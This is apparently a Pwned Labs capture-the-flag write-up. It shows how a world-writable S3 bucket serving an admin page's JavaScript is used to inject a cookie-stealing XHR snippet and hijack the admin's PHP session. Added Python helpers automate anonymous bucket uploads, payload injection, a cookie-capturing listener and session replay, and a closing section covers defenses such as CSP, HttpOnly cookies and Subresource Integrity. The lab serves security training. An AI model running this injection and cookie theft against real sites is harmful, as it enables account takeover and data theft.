
Pwned Labs - Leverage Writable S3 Bucket to Steal Admin Cookie


Scenario

After gaining a foothold in the Huge Logistics AWS environment by compromising a user in a phishing attack, you found an ssh.txt file on their desktop containing an IP address along with the credentials marco:hlpass99. You have been tasked with getting deeper into their on-premises and AWS networks, and have permission to exploit any other users or interactive processes you may find!

Learning Outcomes

- Basic source code enumeration

- Familiarity with the AWS CLI

- Enumerating and assessing S3 bucket security

- Performing a session hijacking attack to steal and use an admin’s cookie

- Using Amazon Macie to identify public buckets (follow-up lab recommended)

- Understanding the web server settings that could have mitigated this attack

Real World Context

Stealing and using cookies from privileged users is a serious, real-world security issue. This type of attack, often referred to as “session sidejacking” or “session hijacking,” involves an attacker obtaining a user’s session cookie, which allows them to impersonate that user in a web application. In a web application, administrative privileges often allow access to sensitive information or to other functionality that may be abusable. As for writable S3 buckets, various sources estimate that between 5% and 20% of all public S3 buckets are writable!

Entry Point

10.138.0.30

Attack

As we have an entry-point IP address and credentials, we first check whether we can use them to gain a foothold. The SSH login succeeds, so we run `bash` to get a more usable shell and start basic enumeration. There is nothing in the home directory and we don’t have sudo permissions, but we do see that a web server is listening on port 80:

```text
marco@ip-10-138-0-30:~$ ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53     0.0.0.0:*
udp   UNCONN 0      0      10.138.0.30%eth0:68  0.0.0.0:*
tcp   LISTEN 0      4096   127.0.0.53%lo:53     0.0.0.0:*
tcp   LISTEN 0      128    0.0.0.0:22           0.0.0.0:*
tcp   LISTEN 0      511    *:80                 *:*
tcp   LISTEN 0      128    [::]:22              [::]:*
```

We navigate to the /var/www/html directory and find some files of interest, notably the Excel spreadsheet and config.php. However, we can’t read either of them at this point: both are owned by www-data and grant no permissions to other users.

```text
marco@ip-10-138-0-30:/var/www/html$ ls -la
total 60
drwxr-xr-x 3 www-data www-data  4096 Jul 17 01:41 .
drwxr-xr-x 3 root     root      4096 Jan  3  2024 ..
-r--r----- 1 www-data www-data 12107 Jan  3  2024 8e685ca5924cbe9d3cd27efcd29d8763.xlsx
-rw-r--r-- 1 www-data www-data  4331 Jul 17 01:41 admin.php
drwxr-xr-x 2 www-data www-data  4096 Jul 17 01:41 assets
-rw-r----- 1 www-data www-data   110 Jan  3  2024 config.php
-rw-r--r-- 1 www-data www-data    19 Jan  3  2024 contact_me.php
-rw-r--r-- 1 www-data www-data  3464 Jul 17 01:41 home.php
-rw-r--r-- 1 www-data www-data 15409 Jul 17 01:41 index.php
```
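To make the permission reasoning explicit: assuming marco is neither the owner (www-data) nor a member of the www-data group, which is consistent with the files being unreadable, only the last three characters of each mode string (the “other” permissions) apply to us. The helper below is a minimal, hypothetical sketch that parses GNU `ls -la` lines like the ones above and reports whether “other” users can read each entry. It assumes filenames without spaces.

```python
import re
from typing import Tuple

# Hypothetical parser for GNU `ls -la` long-listing lines, e.g.
# "-r--r----- 1 www-data www-data 12107 Jan  3  2024 report.xlsx"
LS_LINE = re.compile(r"^([d-][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+.+?\s(\S+)$")


def readable_by_others(ls_line: str) -> Tuple[str, bool]:
    """Return (filename, True if the "other" permission triad includes read)."""
    match = LS_LINE.match(ls_line)
    if match is None:
        raise ValueError(f"unrecognised ls line: {ls_line!r}")
    mode, name = match.groups()
    # Positions 7-9 of the mode string hold the permissions for "other" users,
    # which is what applies to an account that is not the owner or in the group.
    return name, mode[7] == "r"
```

Run over the listing above (skipping the `total 60` line, which raises `ValueError`), it flags only the spreadsheet and config.php as unreadable by other users.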

Looking inside home.php, we can see that its stylesheets and scripts are loaded from an S3 bucket:

```html
[snip]
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Admin Panel Log in</title>
  <!-- Tell the browser to be responsive to screen width -->
  <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <!-- Bootstrap 3.3.6 -->
  <link rel="stylesheet" href="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/bootstrap.min.css">
  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/font-awesome.min.css">
  <script src="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/bootstrap.min.js" ></script>
  <script src="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/jquery-3.7.0.min.js" ></script>
  <link href="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/font.css" rel="stylesheet">
  <link href="https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com/assets/default.css" rel="stylesheet">
</head>
[snip]
```
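Spotting the bucket by eye works for one file, but the same check can be scripted across a whole web root. The sketch below is a hypothetical helper that pulls bucket names out of virtual-hosted-style S3 URLs (`https://<bucket>.s3.amazonaws.com/...`, optionally with a region). Path-style URLs such as `https://s3.amazonaws.com/<bucket>/...` are deliberately not handled.

```python
import re
from typing import Set

# Virtual-hosted-style S3 URLs: https://<bucket>.s3.amazonaws.com/<key>,
# optionally regional, e.g. <bucket>.s3.us-east-1.amazonaws.com
# or the older <bucket>.s3-us-west-2.amazonaws.com form.
S3_URL = re.compile(
    r"https?://([a-z0-9][a-z0-9.-]{1,61}[a-z0-9])\.s3(?:[.-][a-z0-9-]+)?\.amazonaws\.com/"
)


def find_buckets(html: str) -> Set[str]:
    """Return the distinct bucket names referenced by S3 URLs in a page."""
    return set(S3_URL.findall(html))
```

Fed the excerpt above, it returns `{"frontend-web-assets-3bf50bf21342"}`.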

Having finished enumerating the server, we shift our focus to the S3 bucket referenced in home.php. Browsing to the web application presents an Admin Panel login page, where we try some common username:password combinations without success.

The bucket is configured to allow public listing, so we can enumerate its contents with an unauthenticated request by passing the `--no-sign-request` parameter:

```text
❯ aws s3 ls s3://frontend-web-assets-3bf50bf21342 --recursive --no-sign-request
2024-07-17 09:40:51       6987 assets/1.jpg
2024-07-17 09:40:51    1219655 assets/11.jpg
2024-07-17 09:40:51      15337 assets/2.jpg
2024-07-17 09:40:51      54967 assets/2.png
2024-07-17 09:40:51    2553456 assets/22.jpg
2024-07-17 09:40:51    3213672 assets/33.jpg
2024-07-17 09:40:51    1808528 assets/55.jpg
2024-07-17 09:40:51       1536 assets/agency.js
2024-07-17 09:40:51       1092 assets/agency.min.js
2024-07-17 09:40:51      32403 assets/bootstrap-grid.css
2024-07-17 09:40:51      24162 assets/bootstrap-grid.min.css
2024-07-17 09:40:51       4964 assets/bootstrap-reboot.css
2024-07-17 09:40:51       4066 assets/bootstrap-reboot.min.css
2024-07-17 09:40:51     192909 assets/bootstrap.bundle.js
2024-07-17 09:40:51      69453 assets/bootstrap.bundle.min.js
2024-07-17 09:40:51     159202 assets/bootstrap.css
2024-07-17 09:40:51     111610 assets/bootstrap.js
2024-07-17 09:40:51     127343 assets/bootstrap.min.css
2024-07-17 09:40:51      50564 assets/bootstrap.min.js
2024-07-17 09:40:51    1219655 assets/chris-white-366004.jpg
2024-07-17 09:40:51       2807 assets/contact_me.js
2024-07-17 09:40:51       2252 assets/default.css
2024-07-17 09:40:51      27466 assets/font-awesome.min.css
2024-07-17 09:40:51        178 assets/font.css
2024-07-17 09:40:51      77160 assets/fontawesome-webfont.woff2
2024-07-17 09:40:51     433078 assets/header1.jpg
2024-07-17 09:40:51      36329 assets/itw.jpg
2024-07-17 09:40:51      37173 assets/jqBootstrapValidation.js
2024-07-17 09:40:51      87462 assets/jquery-3.7.0.min.js
2024-07-17 09:40:51     316940 assets/map-image.png
```
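Behind `--no-sign-request`, the CLI simply sends S3 REST requests without an AWS signature. As a minimal sketch of that, assuming the bucket answers on the global `<bucket>.s3.amazonaws.com` endpoint, the listing above roughly corresponds to anonymous `ListObjectsV2` calls (`GET /?list-type=2`). The `continuation-token` parameter pages through buckets with more than 1,000 keys. The helper names are hypothetical.

```python
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

S3_NS = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}


def listing_url(bucket: str, token: Optional[str] = None) -> str:
    """URL for one page of an anonymous ListObjectsV2 request."""
    params = {"list-type": "2"}
    if token:
        params["continuation-token"] = token
    return f"https://{bucket}.s3.amazonaws.com/?{urllib.parse.urlencode(params)}"


def parse_listing(body: bytes) -> Tuple[List[Tuple[str, int]], Optional[str]]:
    """Extract (key, size) pairs and the next continuation token, if any."""
    root = ET.fromstring(body)
    objects = [
        (item.findtext("s3:Key", namespaces=S3_NS), int(item.findtext("s3:Size", namespaces=S3_NS)))
        for item in root.findall("s3:Contents", S3_NS)
    ]
    truncated = root.findtext("s3:IsTruncated", default="false", namespaces=S3_NS) == "true"
    token = root.findtext("s3:NextContinuationToken", namespaces=S3_NS) if truncated else None
    return objects, token


def list_public_bucket(bucket: str) -> List[Tuple[str, int]]:
    """Page through an unsigned listing; urlopen raises HTTPError (403) if listing is not public."""
    objects: List[Tuple[str, int]] = []
    token: Optional[str] = None
    while True:
        # No Authorization header is sent: this is the unsigned request that --no-sign-request implies.
        with urllib.request.urlopen(listing_url(bucket, token)) as resp:
            page, token = parse_listing(resp.read())
        objects.extend(page)
        if token is None:
            return objects
```

`list_public_bucket("frontend-web-assets-3bf50bf21342")` should yield the same keys and sizes as the CLI output.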

We download the bucket’s contents to our local machine using `aws s3 cp s3://frontend-web-assets-3bf50bf21342 . --recursive --no-sign-request`, which also gives us pristine copies of every file, and then check the bucket and object ACLs:

```text
❯ aws s3api get-bucket-acl --bucket frontend-web-assets-3bf50bf21342 --no-sign-request
An error occurred (AccessDenied) when calling the GetBucketAcl operation: Access Denied

❯ aws s3api get-object-acl --bucket frontend-web-assets-3bf50bf21342 --key assets/22.jpg --no-sign-request
An error occurred (AccessDenied) when calling the GetObjectAcl operation: Access Denied
```

As we were unable to retrieve the ACLs, we fall back to an old-school approach and simply try to upload a file to the bucket. The upload succeeds and the file appears in the listing, confirming that the bucket is world-writable:

```text
❯ echo "This is a test" > test

❯ aws s3 cp test s3://frontend-web-assets-3bf50bf21342/assets/test --no-sign-request
upload: ./test to s3://frontend-web-assets-3bf50bf21342/assets/test

❯ aws s3 ls s3://frontend-web-assets-3bf50bf21342/assets/ --no-sign-request | grep test
2024-07-17 10:11:35         15 test
```
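The upload test can likewise be expressed as a single unsigned `PUT` request. The hypothetical helper below builds one with Python’s standard library, assuming the same global endpoint as before. It also sets a `Content-Type` guessed from the key’s extension, as `aws s3 cp` does by default, so that a replaced `.js` file is still served with a JavaScript MIME type.

```python
import mimetypes
import urllib.parse
import urllib.request


def anonymous_put(bucket: str, key: str, body: bytes) -> urllib.request.Request:
    """Build an unsigned PutObject request, roughly what
    `aws s3 cp ... --no-sign-request` sends for a small file."""
    url = f"https://{bucket}.s3.amazonaws.com/{urllib.parse.quote(key)}"
    # Guess the MIME type from the extension so a replaced .js file is still
    # served as JavaScript; fall back to a generic binary type otherwise.
    content_type = mimetypes.guess_type(key)[0] or "application/octet-stream"
    return urllib.request.Request(
        url, data=body, method="PUT", headers={"Content-Type": content_type}
    )
```

Passing the request to `urllib.request.urlopen` succeeds only if the bucket accepts anonymous writes. Otherwise it raises `HTTPError`, typically with status 403.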

Recall that there is an admin login page. A reasonable assumption is that an administrator, or an automated process acting as one, periodically loads it. We could therefore modify one of the JavaScript files that admin.php loads from the bucket, set up a listener on the server, and wait for the admin’s cookie, which we could then use to bypass the login page.

We choose the bootstrap.min.js file and modify it by adding the following to the beginning of the file:

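```javascript
// Prepended to bootstrap.min.js: send the visitor's cookies to our listener
var xhr = new XMLHttpRequest();
// encodeURIComponent stops characters such as '&' or '#' in the cookie string from mangling the URL
xhr.open("GET", "http://localhost:8000/steal?cookie=" + encodeURIComponent(document.cookie), true);
xhr.send();
```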

The following is a breakdown of the code:

- `var xhr = new XMLHttpRequest();`: This creates a new XMLHttpRequest object.

- `xhr.open(...)`: This initialises an asynchronous GET request to a listener on port 8000, with the page’s cookies (`document.cookie`) appended to the URL. We use port 8000 because, being above 1024, it can be bound by an unprivileged user such as marco. `localhost` works because, as the captured request later confirms, the admin’s browser runs on this same server.

- `xhr.send();`: This sends the request, delivering the cookies to us.
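Because the payload is prepended rather than substituted, the rest of bootstrap.min.js still runs and the admin page keeps working, which makes the tampering less noticeable. The following is a minimal sketch of producing the modified file. `poison_script` and its default listener URL are illustrative, and this variant URL-encodes the cookie string with `encodeURIComponent`.

```python
# Illustrative payload; the listener URL must match where your listener actually runs.
PAYLOAD_TEMPLATE = (
    "var xhr = new XMLHttpRequest();\n"
    'xhr.open("GET", "{listener}/steal?cookie=" + encodeURIComponent(document.cookie), true);\n'
    "xhr.send();\n"
)


def poison_script(original: str, listener: str = "http://localhost:8000") -> str:
    """Prepend the cookie-exfiltration snippet to a JavaScript file's contents."""
    payload = PAYLOAD_TEMPLATE.format(listener=listener)
    # Idempotent: don't stack a second copy if the file is already modified.
    if original.startswith(payload):
        return original
    # The original library code follows unchanged, so the page keeps working.
    return payload + original
```

For example, read the copy of `assets/bootstrap.min.js` downloaded earlier, pass its contents through `poison_script`, and write the result to the file you upload. Calling it on an already-modified file returns the file unchanged.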

On the target server, we set up a listener with `nc -nlvp 8000` and then upload the modified file to the S3 bucket:

```text
❯ aws s3 cp bootstrap.min.js s3://frontend-web-assets-3bf50bf21342/assets/bootstrap.min.js --no-sign-request
upload: ./bootstrap.min.js to s3://frontend-web-assets-3bf50bf21342/assets/bootstrap.min.js
```



We immediately get a response in our listener that contains the cookie. Note that it arrives as a CORS preflight (`OPTIONS`) request, with the session ID in the URL:

```text
marco@ip-10-138-0-30:~$ nc -nlvp 8000
Listening on 0.0.0.0 8000
Connection received on 127.0.0.1 41904
OPTIONS /?PHPSESSID=qkb03bui9ufqi4vgl6okn3t3ea HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Accept: */*
Access-Control-Request-Method: GET
Access-Control-Request-Headers: accept
Origin: http://localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/120.0.6099.216 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate, br
```


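In the capture above, the browser asked for permission with a preflight before sending the real GET. Because `nc` never replies, that GET is never sent. The cookie leaked anyway because it was already in the URL. If you would rather use a listener that answers preflights (so the follow-up GET arrives too) and extracts the cookies for you, the standard-library sketch below is one option. It assumes python3 is available on the target, and `extract_cookies`, `StealHandler` and `serve` are hypothetical names. `extract_cookies` accepts both the `?cookie=...` form used by the payload and bare parameters such as the `/?PHPSESSID=...` seen above.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict
from urllib.parse import parse_qs, urlsplit


def extract_cookies(path: str) -> Dict[str, str]:
    """Pull leaked cookies out of a request path such as
    /steal?cookie=PHPSESSID%3Dabc or /?PHPSESSID=abc."""
    query = parse_qs(urlsplit(path).query)
    cookies: Dict[str, str] = {}
    # Form 1: the whole document.cookie string ("a=1; b=2") in a "cookie" parameter.
    for part in query.get("cookie", [""])[0].split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    # Form 2: cookies sent directly as query parameters.
    for name, values in query.items():
        if name != "cookie":
            cookies.setdefault(name, values[0])
    return cookies


class StealHandler(BaseHTTPRequestHandler):
    def _log_and_reply(self) -> None:
        print(self.command, self.path, extract_cookies(self.path), flush=True)
        # A 2xx status plus permissive CORS headers lets a preflighted
        # browser continue and send the actual GET as well.
        self.send_response(204)
        self.send_header("Access-Control-Allow-Origin", self.headers.get("Origin", "*"))
        self.send_header("Access-Control-Allow-Methods", "GET, OPTIONS")
        self.send_header(
            "Access-Control-Allow-Headers",
            self.headers.get("Access-Control-Request-Headers", "*"),
        )
        self.end_headers()

    do_GET = _log_and_reply
    do_OPTIONS = _log_and_reply


def serve(port: int = 8000) -> None:
    """Listen on all interfaces, like `nc -nlvp 8000`, until interrupted."""
    HTTPServer(("0.0.0.0", port), StealHandler).serve_forever()
```

Saved as a file such as `listener.py`, it can be started in place of netcat with `python3 -c 'import listener; listener.serve()'`.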

After replacing the PHPSESSID cookie in our browser with the stolen value, we navigate to /home.php and are presented with the following page:


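The same hijack can be reproduced without a browser, which is handy for checking whether a stolen session is still valid. The following is a minimal sketch. It assumes the application is reached from marco’s shell at `http://localhost` and that `PHPSESSID` is the only cookie it checks. `hijacked_request` is a hypothetical helper.

```python
import urllib.request


def hijacked_request(base_url: str, session_id: str, path: str = "/home.php") -> urllib.request.Request:
    """Build a request that presents a stolen PHP session ID as our own."""
    return urllib.request.Request(
        base_url.rstrip("/") + path,
        # The same header the admin's browser sends; PHP looks the session up by this ID.
        headers={"Cookie": f"PHPSESSID={session_id}"},
    )
```

`urllib.request.urlopen(hijacked_request("http://localhost", "qkb03bui9ufqi4vgl6okn3t3ea")).read()` should return the admin page rather than the login form for as long as the session remains valid.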

We click on Export as XLS and it downloads a file which contains the following information

To return the system to normal, we simply copy the original bootstrap.min.js back to the bucket, overwriting our modified version, and the site behaves exactly as it did before.
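To confirm that the restore worked, the object in the bucket can be compared with the pristine copy downloaded earlier. For a single-part upload that is not encrypted with SSE-KMS or SSE-C, the S3 `ETag` is the hex MD5 digest of the object. This minimal check therefore assumes the file was uploaded in one part (bootstrap.min.js is about 50 KB) and remains publicly readable. The helper names are hypothetical.

```python
import hashlib
import urllib.parse
import urllib.request


def object_etag(bucket: str, key: str) -> str:
    """Fetch an object's ETag with an unsigned HEAD request."""
    url = f"https://{bucket}.s3.amazonaws.com/{urllib.parse.quote(key)}"
    with urllib.request.urlopen(urllib.request.Request(url, method="HEAD")) as resp:
        return resp.headers["ETag"].strip('"')


def matches_etag(local_copy: bytes, etag: str) -> bool:
    """True if the local bytes have the MD5 that S3 reports as the ETag
    (only meaningful for single-part, non-SSE-KMS/SSE-C uploads)."""
    return hashlib.md5(local_copy).hexdigest() == etag
```

For example, compare `open("assets/bootstrap.min.js", "rb").read()` from the earlier recursive download with `object_etag("frontend-web-assets-3bf50bf21342", "assets/bootstrap.min.js")`.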

Defense

There are several measures that could have made this environment more secure. The first is not having world-readable or world-writable public S3 buckets at all. Buckets like this one can easily be detected with Amazon Macie, for example using the following syntax from the AWS CLI:

```bash
aws macie2 describe-buckets --region <region> \
  --criteria '{"publicAccess.effectivePermission":{"eq":["PUBLIC"]}}' \
  --query 'buckets[*].{BucketName: bucketName, AllowsPublicReadAccess: publicAccess.permissionConfiguration.bucketLevelPermissions.bucketPolicy.allowsPublicReadAccess, AllowsPublicWriteAccess: publicAccess.permissionConfiguration.bucketLevelPermissions.bucketPolicy.allowsPublicWriteAccess}' \
  --output table
```
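The `--query` above only reports the bucket-policy fields, so a bucket that is public because of its ACL could show `False` in both columns even though Macie flags it as public. As a sketch, the hypothetical helper below summarises a `DescribeBuckets` response and checks both the bucket policy and the ACL. The input can be the JSON from the same command run with `--output json` and no `--query`.

```python
from typing import Any, Dict, List


def public_buckets(response: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Summarise a Macie DescribeBuckets response, treating a bucket as publicly
    readable/writable if either its bucket policy or its ACL allows it."""
    rows = []
    for bucket in response.get("buckets", []):
        access = bucket.get("publicAccess") or {}
        config = access.get("permissionConfiguration") or {}
        perms = config.get("bucketLevelPermissions") or {}
        policy = perms.get("bucketPolicy") or {}
        acl = perms.get("accessControlList") or {}
        rows.append(
            {
                "bucketName": bucket.get("bucketName"),
                "publicRead": bool(policy.get("allowsPublicReadAccess") or acl.get("allowsPublicReadAccess")),
                "publicWrite": bool(policy.get("allowsPublicWriteAccess") or acl.get("allowsPublicWriteAccess")),
            }
        )
    return rows
```

The same function also accepts the dict returned by the boto3 `macie2` client’s `describe_buckets(criteria=...)` call.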

The following security configurations could also have been implemented on the web server and in the application:

- Using HTTPS: We should always use HTTPS rather than plain HTTP. HTTPS encrypts the data between the client and server, preventing man-in-the-middle attacks and eavesdropping, so cookies cannot simply be sniffed off the network. On its own, however, it would not have stopped this attack. The tampered script runs inside the admin’s browser and reads the cookie directly, before anything is encrypted.

- Implementing a Content Security Policy (CSP): It is recommended to send a Content Security Policy header from your web application. Its `connect-src` directive restricts which origins scripts may contact via XHR or fetch. A policy such as `connect-src 'self'` would have blocked the request to `localhost:8000`, which is a different origin from the site on port 80, and so would have prevented the exfiltration in this scenario.

- Using the SameSite Cookie Attribute: We can set the `SameSite` attribute of cookies to `Strict` or `Lax` so that the cookie is only sent with requests originating from the same site, which reduces the risk of cross-site request forgery attacks. It would not have prevented this particular attack, though, since the injected script read the cookie directly.

- Specifying an HttpOnly Attribute: We can use the `HttpOnly` attribute for cookies, which prevents the cookie from being accessed via JavaScript. This means that even if malicious JavaScript is injected, it can’t read the cookie value.

- Enforcing Subresource Integrity Checks: Subresource Integrity (SRI) is a security feature that enables browsers to verify that resources (e.g., scripts or stylesheets) fetched from a third-party source have not been altered. By including a cryptographic hash in the resource’s HTML tag (the `integrity` attribute, alongside a `crossorigin` attribute for cross-origin resources), the browser can compare the fetched file’s hash with the specified one, ensuring the integrity and authenticity of the resource. If the hashes don’t match, the browser will refuse to execute or apply the resource, thereby protecting against malicious modifications.
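SRI hashes, hardened cookie attributes and a restrictive `connect-src` can all be generated with a few lines of Python. The sketch below is illustrative rather than drop-in. The CSP string is only a starting point that assumes the pages load scripts, styles, fonts and images solely from their own origin and the asset bucket. In PHP, the cookie flags would normally be set through the `session.cookie_httponly`, `session.cookie_secure` and `session.cookie_samesite` settings rather than by hand.

```python
import base64
import hashlib
from http.cookies import SimpleCookie

# Origin of the static assets, taken from home.php.
ASSET_ORIGIN = "https://frontend-web-assets-3bf50bf21342.s3.amazonaws.com"

# Starting-point CSP: connect-src 'self' blocks XHR/fetch to any origin other
# than the page's own, such as the localhost:8000 listener used in this attack.
CSP = (
    f"default-src 'self'; script-src 'self' {ASSET_ORIGIN}; "
    f"style-src 'self' {ASSET_ORIGIN}; font-src 'self' {ASSET_ORIGIN}; "
    f"img-src 'self' {ASSET_ORIGIN}; connect-src 'self'"
)


def sri_hash(content: bytes) -> str:
    """Subresource Integrity value (SHA-384, base64) for a file's bytes."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode("ascii")


def script_tag(url: str, content: bytes) -> str:
    # crossorigin="anonymous" is needed for SRI on cross-origin (e.g. S3) resources.
    return f'<script src="{url}" integrity="{sri_hash(content)}" crossorigin="anonymous"></script>'


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header with HttpOnly, Secure and SameSite=Strict."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    morsel = cookie["PHPSESSID"]
    morsel["path"] = "/"
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Strict"  # the samesite attribute needs Python 3.8+
    return cookie.output()
```

The integrity hashes would live in the HTML generated by home.php and admin.php on the web server, which marco could not modify, so a tampered bootstrap.min.js would have been refused. Because `crossorigin="anonymous"` makes the browser fetch the asset in CORS mode, the bucket would also need a CORS configuration that allows the site’s origin.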